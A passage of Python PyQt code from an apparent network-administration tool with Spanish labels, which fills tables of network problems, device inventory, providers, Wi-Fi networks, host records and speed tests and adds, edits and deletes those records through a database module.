if \"BIEN\" in str(i[a]).upper() or \"BUENO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(114, 110, 255))\r\n tabla.setItem(reg,a,formato)\r\n elif \"REGULAR\" in str(i[a]).upper() or \"NO VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 103, 50))\r\n tabla.setItem(reg,a,formato)\r\n elif \"MAL\" in str(i[a]).upper() or \"NO CORREGIDO\" in str(i[a]).upper() or \"NO PERMITIDO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setForeground(QColor(255, 255, 255))\r\n formato.setBackground(QColor(255, 79, 97))\r\n tabla.setItem(reg,a,formato)\r\n elif \"CORRECTO\" in str(i[a]).upper() or \"CORREGIDO\" in str(i[a]).upper() or \"LIBRE\" in str(i[a]).upper() or \"EXCELENTE\" in str(i[a]).upper() or \"VERIFICADO\" in str(i[a]).upper():\r\n formato=QTableWidgetItem(str(i[a]))\r\n formato.setBackground(QColor(67, 144, 67))\r\n formato.setForeground(QColor(255, 255, 255))\r\n tabla.setItem(reg,a,formato)\r\n else:\r\n tabla.setItem(reg,a,QTableWidgetItem(str(i[a])))\r\n reg+=1\r\n tabla.resizeRowsToContents()\r\n for i in range(0,tabla.columnCount()):\r\n tabla.setColumnWidth(i,tabla.width()/tabla.columnCount())\r\n def filtradoV(self,filtrado,valor):\r\n if \"|\" in filtrado:\r\n aux=filtrado.split(\"|\")\r\n for i in aux:\r\n if i in valor:\r\n return True\r\n if \"&\" in filtrado:\r\n aux=filtrado.split(\"&\")\r\n encontrado=0\r\n for i in aux:\r\n if i in valor:\r\n encontrado+=1\r\n if len(aux)==encontrado:\r\n return True\r\n if \"|\" not in filtrado and \"&\" not in filtrado:\r\n if filtrado in valor:\r\n return True\r\n return False\r\n def DBproblemasRed(self):\r\n self.seccionadoDB(self.ui.G_PR,\"PR\")\r\n dep=db.consultarDEPARTAMENTOS()\r\n self.ui.PR_DEP.clear()\r\n for i in dep: self.ui.PR_DEP.addItem(str(i[0])+\":\"+i[1])\r\n dep=db.consultarRED()\r\n self.ui.PR_RED.clear()\r\n for i in dep: self.ui.PR_RED.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,8): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Solución\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Corregido\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Fecha correxión\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Red\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Departamento\"))\r\n aux = db.consultarPROBLEMAS_RED()\r\n self.agregarF(self.ui.SalidaGestion,aux,8)\r\n \r\n def DBreportes(self):\r\n self.seccionadoDB(self.ui.G_R,\"R\")\r\n self.borrarTabla()\r\n dep=db.consultarPROVEEDOR()\r\n self.ui.R_PROV.clear()\r\n for i in dep: self.ui.R_PROV.addItem(str(i[0])+\":\"+i[1])\r\n for i in range(0,10): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Folio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Acudio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Remoto / Sitio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Motivo\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Telefono\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(8,QTableWidgetItem(\"Atendio\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(9,QTableWidgetItem(\"Proveedor\"))\r\n aux = db.consultarREPORTES()\r\n self.agregarF(self.ui.SalidaGestion,aux,10)\r\n\r\n\r\n def DBinvernario(self):\r\n self.seccionadoDB(self.ui.G_I,\"I\")\r\n dep=db.consultarDEPARTAMENTOS()\r\n self.ui.I_DEP.clear()\r\n for i in dep: self.ui.I_DEP.addItem(str(i[0])+\":\"+i[1])\r\n dep=db.consultarRED()\r\n self.ui.I_RED.clear()\r\n for i in dep: self.ui.I_RED.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,8): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"No. Inventario\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Ubicación\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Tipo Conexión\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Red\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Departamento\"))\r\n aux = db.consultarDISPOSITIVOS()\r\n self.agregarF(self.ui.SalidaGestion,aux,8)\r\n def DBProveedores(self):\r\n self.seccionadoDB(self.ui.G_P,\"P\")\r\n dep=db.consultarTRANSMISION()\r\n self.ui.P_TR.clear()\r\n for i in dep: self.ui.P_TR.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,6): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Descripción\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Telefono\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Tipo\"))\r\n aux = db.consultarPROVEEDOR()\r\n self.agregarF(self.ui.SalidaGestion,aux,6)\r\n def DBRedes(self):\r\n self.seccionadoDB(self.ui.G_RD,\"RD\")\r\n dep=db.consultarPROVEEDOR()\r\n self.ui.RD_PROV.clear()\r\n for i in dep: self.ui.RD_PROV.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,6): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Contraseña\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Subida\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Bajada\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Proveedor\"))\r\n aux = db.consultarRED()\r\n self.agregarF(self.ui.SalidaGestion,aux,6)\r\n def DBControlRed(self):\r\n self.seccionadoDB(self.ui.G_CR,\"CR\")\r\n dep=db.consultarDEPARTAMENTOS()\r\n self.ui.CR_DEP.clear()\r\n for i in dep: self.ui.CR_DEP.addItem(str(i[0])+\":\"+i[1])\r\n dep=db.consultarRED()\r\n self.ui.CR_RED.clear()\r\n for i in dep: self.ui.CR_RED.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,14): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"No. Inventario\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Estado\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Host\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"IPv4\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Vendor\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(8,QTableWidgetItem(\"MAC\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(9,QTableWidgetItem(\"Usuario\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(10,QTableWidgetItem(\"Observaciones\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(11,QTableWidgetItem(\"Verificado\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(12,QTableWidgetItem(\"Tipo\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(13,QTableWidgetItem(\"Departamento\"))\r\n aux = db.consultarCONTROL_RED_ESPECIFICA()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,14)\r\n\r\n def DBUnidades(self):\r\n self.seccionadoDB(self.ui.G_SU,\"U\")\r\n dep=db.consultarTRANSMISION()\r\n self.ui.SU_TR.clear()\r\n for i in dep: self.ui.SU_TR.addItem(str(i[0])+\":\"+i[1])\r\n self.borrarTabla()\r\n for i in range(0,9): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Coordinación\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Con Internet\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"Proveedor\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"Observaciones\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(7,QTableWidgetItem(\"Telefono\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(8,QTableWidgetItem(\"Tipo Transmisión\"))\r\n aux = db.consultarUNIDADES_INTERNET()\r\n self.agregarF(self.ui.SalidaGestion,aux,9)\r\n \r\n def DBDepartamentos(self):\r\n self.seccionadoDB(self.ui.G_D,\"D\")\r\n self.borrarTabla()\r\n for i in range(0,3): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"Nombre\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Descripcion\"))\r\n aux = db.consultarDEPARTAMENTOS()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,3)\r\n\r\n def DBConexiones(self):\r\n self.seccionadoDB(self.ui.G_C,\"C\")\r\n self.borrarTabla()\r\n for i in range(0,4): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"Fecha\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Conexiones\"))\r\n aux = db.consultarHISTORIAL_NUM_CONEXIONES()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,4)\r\n def DBPruebas(self):\r\n for i in range(0,self.ui.TablaVelocidad.rowCount()): self.ui.TablaVelocidad.removeRow(i)\r\n self.ui.TablaVelocidad.setRowCount(0)\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()): self.ui.TablaVelocidad.removeColumn(i)\r\n self.ui.TablaVelocidad.setColumnCount(0)\r\n for i in range (0,12): self.ui.TablaVelocidad.insertColumn(i)\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(1,QTableWidgetItem(\"Fecha\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(2,QTableWidgetItem(\"Hora\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(3,QTableWidgetItem(\"Host\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(4,QTableWidgetItem(\"Sponsor\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(5,QTableWidgetItem(\"Red\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(6,QTableWidgetItem(\"Subida\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(7,QTableWidgetItem(\"Bajada\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(8,QTableWidgetItem(\"Latencia (S)\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(9,QTableWidgetItem(\"Latencia (B)\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(10,QTableWidgetItem(\"Ping\"))\r\n self.ui.TablaVelocidad.setHorizontalHeaderItem(11,QTableWidgetItem(\"Resultado\"))\r\n aux = db.consultarPRUEBAS_VELOCIDAD()\r\n reg=0\r\n self.agregarFS(self.ui.TablaVelocidad,aux,12)\r\n \r\n\r\n def DBHosts(self):\r\n self.seccionadoDB(self.ui.G_H,\"H\")\r\n self.borrarTabla()\r\n for i in range(0,7): self.ui.SalidaGestion.insertColumn(i)\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(0,QTableWidgetItem(\"ID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(1,QTableWidgetItem(\"FECHA\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(2,QTableWidgetItem(\"SSID\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(3,QTableWidgetItem(\"Host\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(4,QTableWidgetItem(\"IPv4\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(5,QTableWidgetItem(\"MAC\"))\r\n self.ui.SalidaGestion.setHorizontalHeaderItem(6,QTableWidgetItem(\"VENDOR\"))\r\n aux = db.consultarHISTORIAL_CONEXIONES()\r\n reg=0\r\n self.agregarF(self.ui.SalidaGestion,aux,7)\r\n def borrarTabla(self):\r\n for i in range(0,self.ui.SalidaGestion.rowCount()): self.ui.SalidaGestion.removeRow(i)\r\n self.ui.SalidaGestion.setRowCount(0)\r\n for i in range(0,self.ui.SalidaGestion.columnCount()): self.ui.SalidaGestion.removeColumn(i)\r\n self.ui.SalidaGestion.setColumnCount(0)\r\n def DBcerrarMenuAct(self):\r\n if self.indicadorV==\"PR\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_PR)\r\n elif self.indicadorV==\"R\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_R)\r\n elif self.indicadorV==\"I\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_I)\r\n elif self.indicadorV==\"P\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_P)\r\n elif self.indicadorV==\"RD\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_RD)\r\n elif self.indicadorV==\"CR\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_CR)\r\n elif self.indicadorV==\"U\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_SU)\r\n elif self.indicadorV==\"D\":\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.P_D)\r\n self.limpiarCampos()\r\n self.indicadorV=\"\"\r\n def DBAbrirMenuAct(self):\r\n if self.indicadorV!=self.indicador:\r\n self.DBcerrarMenuAct()\r\n if self.indicador==\"PR\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_PR)\r\n elif self.indicador==\"R\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_R)\r\n elif self.indicador==\"I\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_I)\r\n elif self.indicador==\"P\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_P)\r\n elif self.indicador==\"RD\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_RD)\r\n elif self.indicador==\"CR\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_CR)\r\n elif self.indicador==\"U\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_SU)\r\n elif self.indicador==\"D\":\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.P_D)\r\n self.indicadorV=self.indicador\r\n else:\r\n if self.indicadorM==False:\r\n self.DBcerrarMenuAct()\r\n formato=\"border-radius:10px;padding: 8px 8px;\"\r\n self.ui.GModificarBtn.setStyleSheet(formato)\r\n self.ui.GEliminarBtn.setStyleSheet(formato)\r\n self.ui.GModificarBtn.setEnabled(False)\r\n self.ui.GEliminarBtn.setEnabled(False)\r\n formato=\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\"\r\n self.ui.CR_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setStyleSheet(formato)\r\n self.ui.I_ADD.setStyleSheet(formato)\r\n self.ui.P_ADD.setStyleSheet(formato)\r\n self.ui.G_AgregarBtn.setStyleSheet(formato)\r\n self.ui.R_ADD.setStyleSheet(formato)\r\n self.ui.RD_ADD.setStyleSheet(formato)\r\n self.ui.SU_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setEnabled(True)\r\n self.ui.I_ADD.setEnabled(True)\r\n self.ui.R_ADD.setEnabled(True)\r\n self.ui.P_ADD.setEnabled(True)\r\n self.ui.CR_ADD.setEnabled(True)\r\n self.ui.RD_ADD.setEnabled(True)\r\n self.ui.SU_ADD.setEnabled(True)\r\n self.ui.G_AgregarBtn.setEnabled(True)\r\n self.ui.SU_ID.setEnabled(True)\r\n indicadorM=False\r\n def DBagregar(self):\r\n self.indicadorM=False\r\n self.DBAbrirMenuAct()\r\n def DBCR_ADD(self):\r\n db.insertarCONTROL_RED_ESPECIFICA(int(self.TextoComboBox(self.ui.CR_RED).split(\":\")[0]),self.ui.CR_IP.text(),self.ui.CR_NOINV.text(),self.TextoComboBox(self.ui.CR_STAT),self.ui.CR_MAC.text(),self.ui.CR_RESP.text(),self.ui.CR_FECHA.text(),self.ui.CR_OBS.toPlainText(),self.ui.CR_HOS.text(),self.TextoComboBox(self.ui.CR_VERFI),self.TextoComboBox(self.ui.CR_TIP),int(self.TextoComboBox(self.ui.CR_DEP).split(\":\")[0]),self.ui.CR_VEND.text())\r\n self.DBControlRed()\r\n def DBD_ADD(self):\r\n db.insertarDEPARTAMENTOS(self.ui.D_NOM.text(),self.ui.D_DES.toPlainText())\r\n self.DBDepartamentos()\r\n def DBI_ADD(self):\r\n db.insertarDISPOSITIVOS(self.ui.I_ID.text(),self.ui.I_NOM.text(),self.ui.I_DESC.toPlainText(),self.ui.I_UBI.text(),self.TextoComboBox(self.ui.I_TC),int(self.TextoComboBox(self.ui.I_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.I_DEP).split(\":\")[0]))\r\n self.DBinvernario()\r\n def DBP_ADD(self):\r\n db.insertarPROVEEDOR(self.ui.P_N.text(),self.ui.P_DES.toPlainText(),self.ui.P_FECH.text(),self.ui.P_TEL.text(),int(self.TextoComboBox(self.ui.P_TR).split(\":\")[0]))\r\n self.DBProveedores()\r\n def DBP_PR(self):\r\n db.insertarPROBLEMAS_RED(self.ui.PR_DESC.toPlainText(),self.ui.PR_FECHA.text(),self.ui.PR_SOL.toPlainText(),self.TextoComboBox(self.ui.PR_COR),self.ui.PR_FECHAC.text(),int(self.TextoComboBox(self.ui.PR_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.PR_DEP).split(\":\")[0]))\r\n self.DBproblemasRed()\r\n def DBP_R(self):\r\n db.insertarREPORTES(self.ui.R_Folio.text(),self.ui.R_Descrip.toPlainText(),self.ui.R_Fecha.text(),self.TextoComboBox(self.ui.R_ACUDIO),self.TextoComboBox(self.ui.R_REMOSIT),self.ui.R_MOT.toPlainText(),self.ui.R_TEL.text(),self.ui.R_ATEND.text(),int(self.TextoComboBox(self.ui.R_PROV).split(\":\")[0]))\r\n self.DBreportes()\r\n def DBP_RD(self):\r\n db.insertarRED(self.ui.RD_S.text(),self.ui.RD_PASS.text(),float(self.ui.RD_SUB.text()),float(self.ui.RD_DAJ.text()),int(self.TextoComboBox(self.ui.RD_PROV).split(\":\")[0]))\r\n self.DBRedes()\r\n def DBP_SU(self):\r\n db.insertarUNIDADES_INTERNET(self.ui.SU_ID.text(),self.ui.SU_NOM.text(),self.ui.SU_CORD.text(),self.TextoComboBox(self.ui.SU_SERV),self.ui.SU_PROVE.text(),self.ui.SU_OBS.toPlainText(),self.ui.SU_FECHA.text(),self.ui.SU_TEL.text(),int(self.TextoComboBox(self.ui.SU_TR).split(\":\")[0]))\r\n self.DBUnidades()\r\n def DBEliminar(self):\r\n if self.indicador==\"PR\":\r\n db.borrarPROBLEMAS_RED(int(self.ID))\r\n self.DBproblemasRed()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"R\":\r\n db.borrarREPORTES(int(self.ID))\r\n self.DBreportes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"I\":\r\n db.borrarDISPOSITIVOS(int(self.ID))\r\n self.DBinvernario()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"P\":\r\n db.borrarPROVEEDOR(int(self.ID))\r\n self.DBProveedores()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"RD\":\r\n db.borrarRED(int(self.ID))\r\n self.DBRedes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"CR\":\r\n db.borrarCONTROL_RED_ESPECIFICA(int(self.ID))\r\n self.DBcerrarMenuAct()\r\n self.DBControlRed()\r\n elif self.indicador==\"U\":\r\n db.borrarUNIDADES_INTERNET(self.ui.SU_ID.text())\r\n self.DBcerrarMenuAct()\r\n self.DBUnidades()\r\n elif self.indicador==\"D\":\r\n db.borrarDEPARTAMENTOS(int(self.ID))\r\n self.DBcerrarMenuAct()\r\n self.DBDepartamentos()\r\n\r\n def DBModificar(self):\r\n if self.indicador==\"PR\":\r\n db.modificarPROBLEMAS_RED(int(self.ID),self.ui.PR_DESC.toPlainText(),self.ui.PR_FECHA.text(),self.ui.PR_SOL.toPlainText(),self.TextoComboBox(self.ui.PR_COR),self.ui.PR_FECHAC.text(),int(self.TextoComboBox(self.ui.PR_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.PR_DEP).split(\":\")[0]))\r\n self.DBproblemasRed()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"R\":\r\n db.modificarREPORTES(int(self.ID),self.ui.R_Folio.text(),self.ui.R_Descrip.toPlainText(),self.ui.R_Fecha.text(),self.TextoComboBox(self.ui.R_ACUDIO),self.TextoComboBox(self.ui.R_REMOSIT),self.ui.R_MOT.toPlainText(),self.ui.R_TEL.text(),self.ui.R_ATEND.text(),int(self.TextoComboBox(self.ui.R_PROV).split(\":\")[0]))\r\n self.DBreportes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"I\":\r\n db.modificarDISPOSITIVOS(int(self.ID),self.ui.I_ID.text(),self.ui.I_NOM.text(),self.ui.I_DESC.toPlainText(),self.ui.I_UBI.text(),self.TextoComboBox(self.ui.I_TC),int(self.TextoComboBox(self.ui.I_RED).split(\":\")[0]),int(self.TextoComboBox(self.ui.I_DEP).split(\":\")[0]))\r\n self.DBinvernario()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"P\":\r\n db.modificarPROVEEDOR(int(self.ID),self.ui.P_N.text(),self.ui.P_DES.toPlainText(),self.ui.P_FECH.text(),self.ui.P_TEL.text(),int(self.TextoComboBox(self.ui.P_TR).split(\":\")[0]))\r\n self.DBProveedores()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"RD\":\r\n db.modificarRED(int(self.ID),self.ui.RD_S.text(),self.ui.RD_PASS.text(),float(self.ui.RD_SUB.text()),float(self.ui.RD_DAJ.text()),int(self.TextoComboBox(self.ui.RD_PROV).split(\":\")[0]))\r\n self.DBRedes()\r\n self.DBcerrarMenuAct()\r\n elif self.indicador==\"CR\":\r\n db.modificarCONTROL_RED_ESPECIFICA(int(self.ID),int(self.TextoComboBox(self.ui.CR_RED).split(\":\")[0]),self.ui.CR_IP.text(),self.ui.CR_NOINV.text(),self.TextoComboBox(self.ui.CR_STAT),self.ui.CR_MAC.text(),self.ui.CR_RESP.text(),self.ui.CR_FECHA.text(),self.ui.CR_OBS.toPlainText(),self.ui.CR_HOS.text(),self.TextoComboBox(self.ui.CR_VERFI),self.TextoComboBox(self.ui.CR_TIP),int(self.TextoComboBox(self.ui.CR_DEP).split(\":\")[0]),self.ui.CR_VEND.text())\r\n self.DBcerrarMenuAct()\r\n self.DBControlRed()\r\n elif self.indicador==\"U\":\r\n db.modificarUNIDADES_INTERNET(self.ui.SU_ID.text(),self.ui.SU_NOM.text(),self.ui.SU_CORD.text(),self.TextoComboBox(self.ui.SU_SERV),self.ui.SU_PROVE.text(),self.ui.SU_OBS.toPlainText(),self.ui.SU_FECHA.text(),self.ui.SU_TEL.text(),int(self.TextoComboBox(self.ui.SU_TR).split(\":\")[0]))\r\n self.DBcerrarMenuAct()\r\n self.DBUnidades()\r\n elif self.indicador==\"D\":\r\n db.modificarDEPARTAMENTOS(int(self.ID),self.ui.D_NOM.text(),self.ui.D_DES.toPlainText())\r\n self.DBcerrarMenuAct()\r\n self.DBDepartamentos()\r\n self.DBcerrarMenuAct()\r\n formato=\"border-radius:10px;padding: 8px 8px;\"\r\n self.ui.GModificarBtn.setStyleSheet(formato)\r\n self.ui.GEliminarBtn.setStyleSheet(formato)\r\n self.ui.GModificarBtn.setEnabled(False)\r\n self.ui.GEliminarBtn.setEnabled(False)\r\n formato=\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\"\r\n self.ui.CR_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setStyleSheet(formato)\r\n self.ui.I_ADD.setStyleSheet(formato)\r\n self.ui.P_ADD.setStyleSheet(formato)\r\n self.ui.G_AgregarBtn.setStyleSheet(formato)\r\n self.ui.R_ADD.setStyleSheet(formato)\r\n self.ui.RD_ADD.setStyleSheet(formato)\r\n self.ui.SU_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setEnabled(True)\r\n self.ui.I_ADD.setEnabled(True)\r\n self.ui.R_ADD.setEnabled(True)\r\n self.ui.P_ADD.setEnabled(True)\r\n self.ui.CR_ADD.setEnabled(True)\r\n self.ui.RD_ADD.setEnabled(True)\r\n self.ui.SU_ADD.setEnabled(True)\r\n self.ui.G_AgregarBtn.setEnabled(True)\r\n self.ui.SU_ID.setEnabled(True)\r\n def TextoComboBox(self,item):\r\n aux= item.itemText(item.currentIndex())\r\n return aux \r\n ID=None\r\n def dobleGestion(self):\r\n self.ID=None\r\n self.indicadorM=True\r\n self.DBAbrirMenuAct()\r\n formato=\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px;\"\r\n self.ui.GModificarBtn.setEnabled(True)\r\n self.ui.GEliminarBtn.setEnabled(True)\r\n self.ui.GModificarBtn.setStyleSheet(formato)\r\n self.ui.GEliminarBtn.setStyleSheet(formato)\r\n self.ui.D_ADD.setEnabled(False)\r\n self.ui.I_ADD.setEnabled(False)\r\n self.ui.R_ADD.setEnabled(False)\r\n self.ui.P_ADD.setEnabled(False)\r\n self.ui.CR_ADD.setEnabled(False)\r\n self.ui.RD_ADD.setEnabled(False)\r\n self.ui.SU_ADD.setEnabled(False)\r\n self.ui.SU_ID.setEnabled(False)\r\n formato=\"border-radius:10px;padding: 8px 8px;\"\r\n self.ui.CR_ADD.setStyleSheet(formato)\r\n self.ui.D_ADD.setStyleSheet(formato)\r\n self.ui.I_ADD.setStyleSheet(formato)\r\n self.ui.P_ADD.setStyleSheet(formato)\r\n self.ui.G_AgregarBtn.setStyleSheet(formato)\r\n self.ui.R_ADD.setStyleSheet(formato)\r\n self.ui.RD_ADD.setStyleSheet(formato)\r\n 